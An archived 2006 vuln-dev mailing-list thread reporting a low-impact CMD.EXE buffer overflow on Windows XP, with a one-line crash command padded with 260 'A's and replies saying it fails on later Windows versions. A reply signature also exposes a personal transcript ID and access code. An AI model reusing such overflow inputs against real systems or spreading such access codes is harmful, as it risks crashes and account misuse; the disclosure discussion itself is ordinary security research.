Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: RE: Windows Command Processor CMD.EXE Buffer Overflow

RE: Windows Command Processor CMD.EXE Buffer Overflow

From: RockyH <rocky.he_at_g-wizinnovations.com>
Date: Sun, 22 Oct 2006 00:05:16 +1000

It didn't work on Windows Server 2003 or Windows 2000 either. (fully patched
and latest SPs)

RH

-----Original Message-----
From: listbounce_at_securityfocus.com [mailto:listbounce_at_securityfocus.com] On
Behalf Of Osvaldo Casagrande
Sent: Friday, 20 October 2006 9:52 PM
To: gregory_panakkal; vuln-dev_at_securityfocus.com
Subject: RE: Windows Command Processor CMD.EXE Buffer Overflow

It does not works on Windows Vista RC1 (5728)

Osvaldo Casagrande
MCSE. MCT, MVP, Security+
Gerente de Servicios
DiviServ S.A.
D: 595(21) 613 828 | Cel. 595 (971) 300 836 | |: ocasagrande_at_diviserv.com | 
Add me to messenger

Busca mis referencias? / Looking for my personal references?
Acces to Programa MVP - Access to Certificaciones MS On "Transcript ID"
input: 740381 / On "Access Code" input: ViewMyInfo

Running Windows Vista RC1- Build 5728 and Office 2007 Beta 2 TR

CONFIDENCIALIDAD: La informacion contenida en este mail y sus anexos es
confidencial y/o privilegiada y esta reservada para el destinatario
unicamente.  Si usted no es el destinatario o un agente responsable de
enviar este mensaje al destinatario final, se le notifica que: No puede
utilizarlo, retransmitirlo, imprimirlo, copiarlo o divulgar las
informaciones contenidas en este mail o sus anexos o tomar cualquier accion
basada en estas informaciones. Si usted recibe este mensaje por error, por
favor avise inmediatamente al remitente, y tenga la amabilidad de borrarlo
de su computadora o cualquier otro banco de datos. DIVISERV agradece su
cooperacion.

This mail message may contain confidential and/or privileged information for
the adressee. If you are not the addressee or authorized to receive this for
the addressee, you must not use, copy, print, retransmit, disclose or take
any action based on this message or any information herein. If you have
received this message by mistake, please advise the sender immediately
replying this message and delete it from your computer and any database.
DIVISERV appreciates your cooperation.

-----Original Message-----
From: listbounce_at_securityfocus.com [mailto:listbounce_at_securityfocus.com] On
Behalf Of gregory_panakkal
Sent: Wednesday, October 18, 2006 11:33 PM
To: vuln-dev_at_securityfocus.com
Subject: Windows Command Processor CMD.EXE Buffer Overflow

Windows Command Processor CMD.EXE Buffer Overflow
Tested on WinXP SP2
Impact - Very Low

Copy-paste the following line in cmd.exe and execute it..
(it is a single command, has been split into multiple lines for
readability sake).

%COMSPEC% /K "dir
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

(260 characters of 'A's)

DEP Comes into the picture.

URL :
http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buff
er-overflow.html

regards,
Gregory Panakkal
www.infogreg.com 

-- 
  gregory_panakkal
  gregory_panakkal_at_fastmail.fm
-- 
http://www.fastmail.fm - I mean, what is it about a decent email service?
Received on Oct 21 2006
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos